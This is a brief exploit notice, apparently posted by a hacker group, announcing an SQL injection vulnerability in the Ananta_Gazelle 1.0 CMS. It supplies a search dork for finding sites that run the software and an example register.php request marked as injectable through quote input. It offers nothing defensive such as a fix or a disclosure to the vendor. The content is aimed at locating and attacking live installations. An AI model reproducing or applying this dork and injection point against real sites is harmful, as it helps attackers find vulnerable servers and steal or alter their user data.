=========================================================== Ananta_Gazelle1.0 SQL Injection Vulnerability ----------------------------------------------------------- foun by :kurdish hackers team group : kurd-team contact : pshela@yahoo.com site : kurdteam.org ----------------------------------------------------------- ------------------------script----------------------------- ----------------------------------------------------------- script: Ananta_Gazelle1.0 download: http://www.anantasoft.com ----------------------------------------------------------- Exploit: -------- dork: "CMS: Ananta Gazelle" Exmple: ------- /register.php?^name=&pass=&controle=&email=&showemail=&save=Save&table=users&active=0&activate=3fb04953d95a94367bb133f862402bce&location=%2FAnanta_Gazelle1.0%2Fregister.php&joindate=2011-04-05+07%3A58%3A50 [is vulnerable to ' input SQL inject] ----------------------------------------------------------- Zryan_kurd ,root-SyS -----------------------------------------------------------